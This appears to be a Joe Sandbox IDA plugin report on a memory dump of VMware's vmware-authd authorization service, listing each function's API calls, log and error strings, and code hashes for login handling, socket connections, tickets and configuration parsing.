Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$CompareErrorLastOrdinalStringwcschr$_printffreememcpy
String ID: Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again.$Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again.$The child environment block is too long. Please fix your environment block and try again.$The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.$The system environment block is too long. Please fix your environment block and try again.$Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.
API String ID: 1816562336-76596275
Opcode ID: 7c8b86de3166bd21bb30a9fd8fcf21a4addf10d8d3b3648ed6fe0df0f9368778
Instruction ID: 7bec18b68eb76bc6de111401370f5462b7a6e8efcd9513900a6ff9ddadb2af57
Opcode Fuzzy Hash: 7c8b86de3166bd21bb30a9fd8fcf21a4addf10d8d3b3648ed6fe0df0f9368778
Instruction Fuzzy Hash: D891E235E002159BCB24AF68D841ABFB7B5EF44708F1A499EEC05A7380E7796E41C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00483550 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,00000400,%s-fd,004813A6,?,ha-nfcssl), ref: 00483592
Warning.VMWAREBASE(?,?,FFFFFFFF,?,?,?,00000400,%s-fd,004813A6,?,ha-nfcssl), ref: 004835C4

Part of subcall function 00486EA0: RevertToSelf.ADVAPI32(004835D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00486E80

Part of subcall function 00483B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00483B96

Warning.VMWAREBASE(FFFFFFFF,?,000000FF,0048A6D7,00000000,?,00000000,?,?,?), ref: 00483638
Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00483651
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 0048366E
CloseHandle.KERNEL32(FFFFFFFF,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 004836A6

Strings

Error connecting to %s service instance., xrefs: 004836C4
bora\apps\vmauthd\authdWin32.c, xrefs: 004836F4
NOT_IMPLEMENTED %s:%d, xrefs: 004836F9
%s-fd, xrefs: 00483573
Connect %s, xrefs: 004835EE
ha-nfcssl, xrefs: 0048356D

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$CloseHandle$RevertSelf
String ID: %s-fd$Connect %s$Error connecting to %s service instance.$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\authdWin32.c$ha-nfcssl
API String ID: 3821156272-2383663668
Opcode ID: 679b5529946f22a9a7035f60c7e33cbd2da2a77a3a5309b4f301a6d93e5e732d
Instruction ID: 63c923f05c5849a5015c628a941c4ad2f3241d2ea89461b6d1a7260d20f040d0
Opcode Fuzzy Hash: 679b5529946f22a9a7035f60c7e33cbd2da2a77a3a5309b4f301a6d93e5e732d
Instruction Fuzzy Hash: B741C4B1600609BBD724EF25CC81F9DF3A8FB04714F100B5AF728672D1D7786A158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00482610 Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,00000000), ref: 00482625
Warning.VMWAREBASE(00000000,vmware,?,00000000), ref: 00482632
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,vmware,?,00000000), ref: 00482638
Warning.VMWAREBASE ref: 0048263E
Warning.VMWAREBASE(?), ref: 00482647
Warning.VMWAREBASE(?,?), ref: 00482665
Warning.VMWAREBASE(00000001,authd.policy.allowRCForRead,?,?), ref: 00482671
Warning.VMWAREBASE(0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00482682
Warning.VMWAREBASE(?,0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 0048268D

Part of subcall function 00482850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,0048269A), ref: 00482864
Part of subcall function 00482850: Warning.VMWAREBASE(?,?,00000000,00000000,?,0048269A), ref: 00482871
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0048269A), ref: 00482887
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0048269A), ref: 00482894
Part of subcall function 00482850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 0048289C
Part of subcall function 00482850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828A3
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828A9
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828AF
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828B5
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828BB
Part of subcall function 00482850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004828C7
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004828D2
Part of subcall function 00482850: Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 004828E7
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 004828F6
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 00482910
Part of subcall function 00482850: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 00482918
Part of subcall function 00482850: Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 0048292B
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482939
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482949
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482956
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00482963
Part of subcall function 00482850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 0048296B
Part of subcall function 00482850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00482972
Part of subcall function 00482850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00482978

Strings

authd.policy.allowRCForRead, xrefs: 0048266A
vmauthd.startupTimeout, xrefs: 00482676
vmware, xrefs: 0048262C

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$free
String ID: authd.policy.allowRCForRead$vmauthd.startupTimeout$vmware
API String ID: 2642810717-3237359284
Opcode ID: e606457a947ba55c11fab3572418d5b9204b01c0119e548230d9e73ad5550870
Instruction ID: 79f7ae7681694a8e56193f876d7ebbd2c8ff8753cee56735332bcc2e28eb1039
Opcode Fuzzy Hash: e606457a947ba55c11fab3572418d5b9204b01c0119e548230d9e73ad5550870
Instruction Fuzzy Hash: B3019230D41608BACB00BBA6DD469AE7BA89F15704B044D2FBD00A6162DBBD1916479E

Uniqueness

Uniqueness Score: -1.00%

Function 00482B60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B6F
Warning.VMWAREBASE(00000000,0048B1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B7C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,0048B1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B84
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000,00000000), ref: 00482BB6
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 00482BFA
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000), ref: 00482C0E
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00482C1C

Strings

vmware-vmx-stats.exe, xrefs: 00482B66

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warningfgets$_strnicmpfclosefree
String ID: vmware-vmx-stats.exe
API String ID: 1422050075-4079124726
Opcode ID: 2c149e02d7082bb4844f4eb989c7ab8ea7135511a0060eb5af3753e0194af135
Instruction ID: f87577a1b94020d89292fd13d9b71ec25dbc0600e048adb2104b9c098d6b60d0
Opcode Fuzzy Hash: 2c149e02d7082bb4844f4eb989c7ab8ea7135511a0060eb5af3753e0194af135
Instruction Fuzzy Hash: F041DA71D041086BDB20ABA49D45BAF7BACDF45314F0408B7FD05E3302E6BA9A598799

Uniqueness

Uniqueness Score: -1.00%

Function 00485B00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 91pipenetworkCOMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,00000000,000000FF,00000001), ref: 00485B12
accept.WS2_32(?,00000000,00000000), ref: 00485B2E
accept.WS2_32(?,00000000,00000000), ref: 00485B4D
GetLastError.KERNEL32 ref: 00485B65
ConnectNamedPipe.KERNEL32(?,00000000), ref: 00485BA6
GetLastError.KERNEL32 ref: 00485BB4
FlushFileBuffers.KERNEL32(?), ref: 00485BD3
DisconnectNamedPipe.KERNEL32(?), ref: 00485BE9
ConnectNamedPipe.KERNEL32(?,00000000), ref: 00485C15

Strings

Accept on local socket failed (%d)., xrefs: 00485B6C

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: NamedPipe$ConnectErrorLastaccept$BuffersDisconnectFileFlushMultipleObjectsWait
String ID: Accept on local socket failed (%d).
API String ID: 3041817889-797927945
Opcode ID: 5238e59fbcec818688dbb29579f9202a993ef789f0c3b516bf909c01131a3421
Instruction ID: 23691dca6e6b0706611e92efeb3655bb4e4eba03c5ee3ddda822a322fbc36101
Opcode Fuzzy Hash: 5238e59fbcec818688dbb29579f9202a993ef789f0c3b516bf909c01131a3421
Instruction Fuzzy Hash: 5931AC70400B00ABE730BF21EC09B0F7AE4AB14719F100E2EF546A66E0D3B9F459CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00481150 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 51COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(attempt to bypass username/password from %.128s,?), ref: 00481176

Part of subcall function 00483B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00483B96

Warning.VMWAREBASE(GET TOKEN KEY failed: got %s,?), ref: 004811B0

Strings

Login from through tokenkey, xrefs: 004811CE
GET TOKEN KEY failed: got %s, xrefs: 004811AB
Login failed: token key authentication not allowed., xrefs: 0048117B
Login successful., xrefs: 004811D8
attempt to bypass username/password from %.128s, xrefs: 00481171
Login failed: token key not found., xrefs: 004811B5

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning
String ID: GET TOKEN KEY failed: got %s$Login failed: token key authentication not allowed.$Login failed: token key not found.$Login from through tokenkey$Login successful.$attempt to bypass username/password from %.128s
API String ID: 2415109466-2849098001
Opcode ID: 1e5d944eb1cec5aa3b8b46ea977035eed6e364b7470e2f3dd9158351b8cbe5c7
Instruction ID: 41bb4b4dbf8b99e42ab0ccfa1bf64edb67e061a26377a5d36676cc6c941c99dc
Opcode Fuzzy Hash: 1e5d944eb1cec5aa3b8b46ea977035eed6e364b7470e2f3dd9158351b8cbe5c7
Instruction Fuzzy Hash: BE01D671280204A7E7107F499C0BF5E3795DB84B09F05087BF908172E3C69DA831872E

Uniqueness

Uniqueness Score: -1.00%

Function 00481D40 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

Part of subcall function 00483710: Warning.VMWAREBASE(?,?,00000001,?,00000000,004813A6), ref: 0048377C
Part of subcall function 00483710: WSAGetLastError.WS2_32(?,00000000,004813A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00483787
Part of subcall function 00483710: WaitForSingleObject.KERNEL32(?,?,?,00000000,004813A6), ref: 004837A8
Part of subcall function 00483710: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004813A6), ref: 004838FC
Part of subcall function 00483710: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004813A6), ref: 00483919

_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0048A5D8,0048A5D9), ref: 00481DF2
Warning.VMWAREBASE(Read failed.), ref: 00481EE7

Strings

Please login with USER and PASS., xrefs: 00481EC9
Received command: %s, xrefs: 00481E48, 00481E50
Read failed., xrefs: 00481EE2
Unknown command '%s', xrefs: 00481EB0
Waiting for next command., xrefs: 00481D7F
Received command: %s ..., xrefs: 00481DCA, 00481E27

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printf_strnicmp
String ID: Please login with USER and PASS.$Read failed.$Received command: %s$Received command: %s ...$Unknown command '%s'$Waiting for next command.
API String ID: 3208188869-2408999901
Opcode ID: f5a0a6283e3f080d6f05a66085565a3ee981d99acb230b3f368267a5739d1fa3
Instruction ID: 2a821a38556dc5e0b053418d1a12cdda382b04a402deecbaf5345d92c1e3fe13
Opcode Fuzzy Hash: f5a0a6283e3f080d6f05a66085565a3ee981d99acb230b3f368267a5739d1fa3
Instruction Fuzzy Hash: 25413770A002059BEB20BA14CC41BFF73ADEF04705F1448ABED49DB252DBBCAD51879A

Uniqueness

Uniqueness Score: -1.00%

Function 00483E70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00487690: EnterCriticalSection.KERNEL32(?,?,?,?,?,00483EB2,?,0000003E,?), ref: 004876B2
Part of subcall function 00487690: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00483EB2,?,0000003E,?), ref: 004876CA
Part of subcall function 00487690: LeaveCriticalSection.KERNEL32 ref: 004876D3

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00483ECA
GetLastError.KERNEL32 ref: 00483EFE
GetLastError.KERNEL32 ref: 00483F17
Warning.VMWAREBASE(00000000), ref: 00483F1E
Sleep.KERNEL32(00001388), ref: 00483F38

Strings

WaitForMultipleObjects failed: %s (%d) , xrefs: 00483F24
Service is stopped while %d child processes are running. Resources will be leaked., xrefs: 00483F51
Unexpected wait result: %d, err %d, xrefs: 00483F06

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeaveMultipleObjectsSleepWaitWarningmemcpy
String ID: Service is stopped while %d child processes are running. Resources will be leaked.$Unexpected wait result: %d, err %d$WaitForMultipleObjects failed: %s (%d)
API String ID: 3501445041-2352199725
Opcode ID: b92a8ca9437eceeff3cea4d4fcf6631f54f41c5e51e36ed664a05ed4c43b8f43
Instruction ID: 80599a067a22505ea536e9bf77b3c209a8780ebaeefd0dd100b334ef5e739fa7
Opcode Fuzzy Hash: b92a8ca9437eceeff3cea4d4fcf6631f54f41c5e51e36ed664a05ed4c43b8f43
Instruction Fuzzy Hash: EB214E71D00115ABD720BF65AC46FBE7368DB25B05F00097BFA55D2291E7748E4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 00488250 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(00000001,?,00000000,?,004881F3,00000000,00000000), ref: 0048825E
Warning.VMWAREBASE(00000000,0048DA14,tickets,0048DA14,00000000,00000000), ref: 00488284
Warning.VMWAREBASE(%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,0048DA14,tickets,0048DA14,00000000,00000000), ref: 00488296
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,%s: Creating ticket directory: %s,TicketGetTicketDir,00000000,00000000,0048DA14,tickets,0048DA14,00000000,00000000), ref: 0048829C
Warning.VMWAREBASE(004881F3), ref: 004882A4

Strings

tickets, xrefs: 00488279
%s: Creating ticket directory: %s, xrefs: 0048828F
TicketGetTicketDir, xrefs: 0048828A

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$free
String ID: %s: Creating ticket directory: %s$TicketGetTicketDir$tickets
API String ID: 2642810717-1121398582
Opcode ID: 0bab3ae88b10c95a6d4d50aaba149c971c38775cf4eb5b6291180f7e68a25578
Instruction ID: 1d66dccbfd2cc82725d05d842183067bc242a618686a6d589c43b205394a2dbd
Opcode Fuzzy Hash: 0bab3ae88b10c95a6d4d50aaba149c971c38775cf4eb5b6291180f7e68a25578
Instruction Fuzzy Hash: E4F0C832A8161072DE117A596C02FEE73584B81F78F240C6FF948762D2DBAE4852139C

Uniqueness

Uniqueness Score: -1.00%

Function 00485960 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000008), ref: 00485968
CreateThread.KERNEL32(00000000,00000000,Function_00003E00,00000000,00000000,00000000), ref: 004859A5
GetLastError.KERNEL32 ref: 004859AF
closesocket.WS2_32(00000000), ref: 004859C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 004859CE

Strings

Could not create thread to handle socket connection. (error %d)., xrefs: 004859B6

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: CreateErrorLastThreadcallocclosesocketfree
String ID: Could not create thread to handle socket connection. (error %d).
API String ID: 516406090-3747702049
Opcode ID: 4aa28b84d388bb920292359e5770a9ee3361532e4a68245ee1895005bd9b12ca
Instruction ID: 75aac7b97298a7a53b41de54af7625c7651d4c43561b014db74280ccc753132e
Opcode Fuzzy Hash: 4aa28b84d388bb920292359e5770a9ee3361532e4a68245ee1895005bd9b12ca
Instruction Fuzzy Hash: D101DB71580210BBE7107FA4BC0EB9E3F949B05B65F10882BFA4D89181C7F99520CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00481900 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112stringCOMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00481924
strrchr.VCRUNTIME140(?,00000020,received %s command: %s,?,?), ref: 0048192C

Part of subcall function 00482360: strchr.VCRUNTIME140(00000000,0000002C,?,?,?,00481956,-00000001,00000000,00000000), ref: 00482379
Part of subcall function 00482360: strchr.VCRUNTIME140(-00000001,0000002C,?,00000000,00000000), ref: 00482395
Part of subcall function 00482360: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000002,?,?,00000000,00000000), ref: 004823B8

Strings

Command '%s%s' not authorized to access the specific VM socket, xrefs: 004819CE
Command '%s%s' not authorized for specified VM, xrefs: 00481990
received %s command: %s, xrefs: 00481911
Invalid arguments to '%s%s', xrefs: 004819F2

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: strchr$Warningatoistrrchr
String ID: Command '%s%s' not authorized for specified VM$Command '%s%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$received %s command: %s
API String ID: 3585856819-255570853
Opcode ID: 43b1f0af1804205e89e280c7944deb2be567e2c4d4cf68255d27bcfd60fc28f9
Instruction ID: 79d7d2b1a51a196b3990fbed301162093a1dc1731d885bb6404f2c15f40eb89b
Opcode Fuzzy Hash: 43b1f0af1804205e89e280c7944deb2be567e2c4d4cf68255d27bcfd60fc28f9
Instruction Fuzzy Hash: D831F9A260418426DB217E258CA5FBF7F6EDB12354F080897EC4586352D61BCD0AC3B9

Uniqueness

Uniqueness Score: -1.00%

Function 00482D50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00482B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B6F
Part of subcall function 00482B60: Warning.VMWAREBASE(00000000,0048B1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B7C
Part of subcall function 00482B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,0048B1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00482B84

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00482D8D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00482DA0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00482DAB

Strings

config.ini, xrefs: 00482D66
VMAuthdConfigGetULong: value %s for variable %s is invalid, xrefs: 00482DC0

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning_errno$freestrtoul
String ID: VMAuthdConfigGetULong: value %s for variable %s is invalid$config.ini
API String ID: 3959447487-65099484
Opcode ID: 94c6843a0b19183918420741d7fd1d6659af604e3c2c64a4defc53daec9d3572
Instruction ID: b3cca6218c9c2b4b6276d16505441887f4a3a962083c00e64125ca0b330bafc6
Opcode Fuzzy Hash: 94c6843a0b19183918420741d7fd1d6659af604e3c2c64a4defc53daec9d3572
Instruction Fuzzy Hash: B6110231601108ABD720BF69DC49BAE7BA8EF41710F4008AEF8054B251CBB91E10C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00483B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,00000400,?,?), ref: 00483B96

Part of subcall function 004839A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 004839D9
Part of subcall function 004839A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00483A21
Part of subcall function 004839A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00483A2B
